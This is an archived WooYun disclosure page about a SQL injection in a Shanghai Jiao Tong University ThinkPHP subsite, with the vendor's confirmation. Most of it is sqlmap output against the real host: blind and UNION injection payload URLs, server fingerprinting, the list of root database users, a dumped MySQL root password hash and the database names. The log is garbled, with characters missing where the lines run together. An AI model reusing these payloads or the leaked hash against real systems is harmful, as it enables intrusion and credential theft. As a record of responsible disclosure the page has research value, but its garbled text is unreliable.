乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-02: 细节已通知厂商并且等待厂商处理中 2015-02-02: 厂商已经确认,细节仅向厂商公开 2015-02-12: 细节向核心白帽子及相关领域专家公开 2015-02-22: 细节向普通白帽子公开 2015-03-04: 细节向实习白帽子公开 2015-03-19: 细节向公众公开
上海交通大学某站root权限sql注入涉及多库
thinkphp的注入,安全不能靠框架,主要看靠程序员网站 oe.sjtu.edu.cn
http://oe.sjtu.edu.cn/index.php/He/article/detailPage/parentID/0/cat_id/1662/artID/1703arameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentI0/cat_id/1662/artID/1703 AND 3661=3661 Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentI0/cat_id/1662/artID/-3770 UNION ALL SELECT NULL,CONCAT(0x3a63756a3a,0x426f486a544f565067,0x3a6962773a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULNULL,NULL,NULL,NULL,NULL,NULL#--00:50:36] [INFO] the back-end DBMS is MySQLeb server operating system: Windows Vistaeb application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.17ack-end DBMS: MySQL 500:50:36] [INFO] fetching database users00:50:37] [INFO] the SQL query used returns 25 entries00:50:37] [INFO] retrieved: "'root'@'localhost'"00:50:37] [INFO] retrieved: "'root'@'localhost'"00:50:38] [INFO] retrieved: "'root'@'localhost'"00:50:38] [INFO] retrieved: "'root'@'localhost'"00:50:38] [INFO] retrieved: "'root'@'localhost'"00:50:39] [INFO] retrieved: "'root'@'localhost'"00:50:39] [INFO] retrieved: "'root'@'localhost'"00:50:39] [INFO] retrieved: "'root'@'localhost'"00:50:40] [INFO] retrieved: "'root'@'localhost'"00:50:40] [INFO] retrieved: "'root'@'localhost'"00:50:41] [INFO] retrieved: "'root'@'localhost'"00:50:41] [INFO] retrieved: "'root'@'localhost'"00:50:41] [INFO] retrieved: "'root'@'localhost'"00:50:42] [INFO] retrieved: "'root'@'localhost'"00:50:42] [INFO] retrieved: "'root'@'localhost'"00:50:42] [INFO] retrieved: "'root'@'localhost'"00:50:43] [INFO] retrieved: "'root'@'localhost'"00:50:43] [INFO] retrieved: "'root'@'localhost'"00:50:43] [INFO] retrieved: "'root'@'localhost'"00:50:44] [INFO] retrieved: "'root'@'localhost'"00:50:44] [INFO] retrieved: "'root'@'localhost'"00:50:44] [INFO] retrieved: "'root'@'localhost'"00:50:45] [INFO] retrieved: "'root'@'localhost'"00:50:45] [INFO] retrieved: "'root'@'localhost'"00:50:45] [INFO] retrieved: "'root'@'localhost'"atabase management system users [1]:*] 'root'@'localhost'00:50:45] [INFO] fetching database users password hashes00:50:46] [INFO] the SQL query used returns 1 entries00:50:46] [INFO] writing hashes to file 'c:\docume~1\admini~1\locals~1\temp\sqaphashes-ox6ete.txt' for eventual further processing with other toolso you want to perform a dictionary-based attack against retrieved password hass? [Y/n/q] natabase management system users password hashes:*] root [1]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD900:50:56] [INFO] fetching database names00:50:57] [INFO] the SQL query used returns 5 entries00:50:57] [INFO] retrieved: "information_schema"00:50:57] [INFO] retrieved: "jd"00:50:58] [INFO] retrieved: "mysql"00:50:58] [INFO] retrieved: "skl"00:50:58] [INFO] retrieved: "test"vailable databases [5]:*] information_schema*] jd*] mysql*] skl*] test
开发的懂
危害等级:高
漏洞Rank:15
确认时间:2015-02-02 15:21
谢谢,我们立即处理!
暂无